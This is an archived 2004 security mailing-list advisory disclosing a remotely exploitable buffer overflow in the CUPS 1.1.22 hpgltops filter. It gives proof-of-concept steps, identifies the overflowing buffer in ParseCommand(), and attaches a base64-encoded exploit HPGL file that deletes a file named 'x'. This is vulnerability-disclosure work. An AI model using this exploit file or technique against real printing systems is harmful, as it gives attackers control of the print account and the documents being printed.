Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm Delivered-To: mailing list securesoftware@list.cr.yp.to Received: (qmail 28540 invoked by uid 1017); 15 Dec 2004 08:20:11 -0000 Date: 15 Dec 2004 08:20:11 -0000 Message-ID: <20041215082011.28539.qmail@cr.yp.to> Mail-Followup-To: securesoftware@list.cr.yp.to, cups@easysw.com Automatic-Legal-Notices: See http://cr.yp.to/mailcopyright.html. From: "D. J. Bernstein" To: securesoftware@list.cr.yp.to, cups@easysw.com Subject: [remote] [control] CUPS 1.1.22 hpgltops ParseCommand overflows buf Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="YZ5djTAD1cGYuMQK" Content-Disposition: inline --YZ5djTAD1cGYuMQK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Ariel Berkman, a student in my Fall 2004 UNIX Security Holes course, has discovered a remotely exploitable security hole in CUPS. I'm publishing this notice, but all the discovery credits should be assigned to Berkman. A CUPS installation is at risk whenever it prints an HPGL file obtained from email (or a web page or any other source that could be controlled by an attacker). You are at risk if you print data through a CUPS installation at risk. The source of the HPGL file has complete control over the CUPS ``lp'' account; in particular, he can read and modify the files you are printing. Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type cd /usr/ports/print/cups make install to download and compile the CUPS package, version 1.1.22 (current). Then, as any user, save the file 21.hpgl.gz attached to this message, and type gunzip 21.hpgl /usr/local/libexec/cups/filter/hpgltops \ 15 $USER test-title 1 none 21.hpgl > 21.ps with the unauthorized result that a file named x is removed from the current directory. (I tested this with a 541-byte environment, as reported by printenv | wc -c.) Here's the bug: In hpgl-input.c, ParseCommand() reads any number of bytes into a 262144-byte buf[] array. ---D. J. Bernstein, Associate Professor, Department of Mathematics, Statistics, and Computer Science, University of Illinois at Chicago --YZ5djTAD1cGYuMQK Content-Type: application/x-gunzip Content-Disposition: attachment; filename="21.hpgl.gz" Content-Transfer-Encoding: base64 H4sICO/Zv0ECAzIxLmhwZ2wA7dG7SmNhFAVgjFMkYOGghWBzakFDBmwSBH9BohDlHHSK6cb7 /ZZ4SSn8Tc7LzBMIJqcUfA9hWvtonsDO6vtg7bX6vb7Z2EprjdlW2Gz+Ds3VpbW02Wq0VgIA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAADAF/5v/MlfYjGT/6z18/AjFlN5Vo5FOc8mYlGKxVieTeZhuhfmeuFX Lyz2Qj2Lg/JnkjgoxcFYFvuN9PWx1k+XP+vt33A43Nnd2z84PDo+OT07v7i8ur5pd27v7h+6 adheW6runlzWq3ed9mgko1PtHCfze0n7IukueAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8g7/v T8+jjFcqlQ8gImE3JAAEAA== --YZ5djTAD1cGYuMQK--